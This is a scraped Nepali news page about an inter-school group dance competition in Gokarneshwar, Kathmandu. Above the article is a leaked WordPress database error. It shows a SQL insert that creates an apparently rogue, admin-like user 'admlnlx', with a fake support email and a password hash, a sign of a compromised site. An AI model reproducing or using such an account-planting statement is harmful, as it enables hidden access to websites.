WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B3JV61g0QJbF9JLlDYn2cF3/q2TuQc1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 10:05:49', '', 'admlnlx', 'admlnlx')
काठमाण्डौं । नृत्य निर्देशक संघ नेपाल, गोकर्णेश्वर नगर कमिटी द्वारा स्थापना दिवसको अवसरमा आयोजित अन्तर विद्यालय स्तरीय सामुहिक नृत्य प्रतियोगिता कार्यक्रम सम्पन्न भएको छ।
साउन २७ शुक्रवारका दिन नयाँ बस्ती स्थित टाइमलाईन स्कुलमा सम्पन्न कार्यक्रममा १८० वटा प्राप्त नृत्यको डिजिटल अडिसन मध्ये सबै विधाबाट तीन–तीन समूह लाई फाईनल चरणमा प्रवेश गराएको कार्यक्रम संयोजक देबराज गुरुङले बताए ।
गोकर्णेस्वर नगरपालिकाको सहकार्यमा आयोजित कार्यक्रममा बिजेता ससम्पूर्ण विद्यालयलाई ट्रफि र प्रमाण पत्र प्रदान गरिएको थियो । गोकर्णेश्वर नगर पालिकाका नगर प्रमुख दिपक रिसालको प्रमुख अतिथिमा सम्पन्न कार्यक्रमा नृत्य निर्देशक संघ नेपालका केन्द्रीय अध्यक्ष भुवन दास श्रेष्ठ, टाइम लाईन स्कुलका प्रिन्सिपल राम प्रसाद वडाल, निर्देशक संघ नेपालका बरिष्ठ उपाध्यक्ष प्रदिप मान श्रेष्ठ, महिला केन्द्रीय उपाध्यक्ष भावना कार्की, केन्द्रीय सचिव ऋषि केश श्रेष्ठ, केन्द्रीय सह–कोषाध्यक्ष केशव कोईराला, भक्तपुर जिल्ला शाखाको अध्यक्ष चुडामणि फूयाल, उपाध्यक्ष नारायणी थापा मगर उपसि्तथि रहेको थियो ।